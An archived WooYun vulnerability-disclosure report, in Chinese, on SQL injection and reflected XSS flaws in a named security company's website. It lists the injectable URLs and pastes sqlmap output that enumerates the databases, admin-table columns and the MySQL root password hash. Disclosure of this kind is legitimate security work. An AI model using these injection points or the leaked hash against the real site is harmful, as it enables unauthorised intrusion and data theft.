乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-28: 厂商已经主动忽略漏洞,细节向公众公开
任子行网络技术股份有限公司(以下简称任子行)成立于2000年5月,是中国最早涉足网络信息安全领域的企业之一,致力于为国家管理机构、运营商、企事业单位和个人网络信息安全保驾护航。 此次友情渗透,涉及到多个部门的信息,希望重视! PS:任子行官网存在多处SQL注入,两处XSS-可直接get ROOT权限
任子行官网
多处存在GET型SQL注入:http://www.1218.com.cn/index.php/product?id=23http://www.1218.com.cn/index.php/company/recruitment?location=&type=43&position=http://www.1218.com.cn/index.php/company/recruitment?location=深圳&type=&position=http://www.1218.com.cn/index.php/company/recruitment?location=深圳 北京&type=&position=http://www.1218.com.cn/index.php/company/recruitment?type=&position=http://www.1218.com.cn/index.php/company/recruitment?location=&position=
两处GET型XSS:http://www.1218.com.cn/index.php/company/recruitment?location=北京&type=&position=http://www.1218.com.cn/index.php/company/recruitment?location=深圳 北京 武汉&type=&position=
[
23:14:55] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.4.9, PHP 5.5.12back-end DBMS: MySQL 5.0.11[23:14:55] [INFO] fetching database names[23:14:55] [INFO] fetching number of databases[23:14:55] [INFO] retrieved: 6[23:15:02] [INFO] retrieved: information_schema[23:17:18] [INFO] retrieved: m[23:17:34] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the requestysql[23:18:22] [INFO] retrieved: performance_schema[23:21:10] [INFO] retrieved: rzxwz[23:21:55] [INFO] retrieved: surfilter[23:23:04] [INFO] retrieved: tes[23:23:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[23:23:33] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the requesttavailable databases [6]:[*] information_schema[*] mysql[*] performance_schema[*] rzxwz[*] surfilter[*] test
Database: rzxwz[23 tables]+-------------------+| ci_addonarticle || ci_admin || ci_admin_role || ci_archives || ci_arctiny || ci_arctype || ci_attachment || ci_channeltype || ci_city || ci_form || ci_log || ci_login_log || ci_member || ci_menu || ci_province || ci_search || ci_search_keyword || ci_sessions || ci_stepselect || ci_sys_enum || ci_sysconfig || ci_system_node || ci_table |+-------------------+
Database: rzxwzTable: ci_admin[21 columns]+---------------+-------------+| Column | Type |+---------------+-------------+| answer | varchar(50) || birthday | varchar(10) || cardid | varchar(18) || createTime | int(11) || email | varchar(50) || group_id | smallint(6) || id | int(11) || lastLoginIp | int(11) || lastLoginTime | int(11) || loginCount | int(11) || mobile | varchar(30) || modifyTime | int(11) || msn | varchar(50) || name | varchar(30) || pass | varchar(32) || phone | varchar(30) || posts | varchar(50) || qq | varchar(20) || question | varchar(50) || realname | varchar(50) || state | tinyint(4) |+---------------+-------------+
database management system users password hashes:[*] root [1]: password hash: *732B4F7C96A81D8135BDDA8B4085A2D759892DE0[23:34:26] [INFO] Fetched data logged to text files under 'E:\Python27\sqlmap\output\www.1218.com.cn'[*] shutting down at: 23:34:26
http://www.1218.com.cn/index.php/company/recruitment?location=%E5%8C%97%E4%BA%AC&type=&position=TEST
http://www.1218.com.cn/index.php/company/recruitment?type=&position=&location=TEST
对于安全厂商来说,WEB安全方面,你们比我懂!我只是个小白!
危害等级:无影响厂商忽略
忽略时间:2015-11-28 11:12
漏洞Rank:4 (WooYun评价)
2015-11-30:正在处理中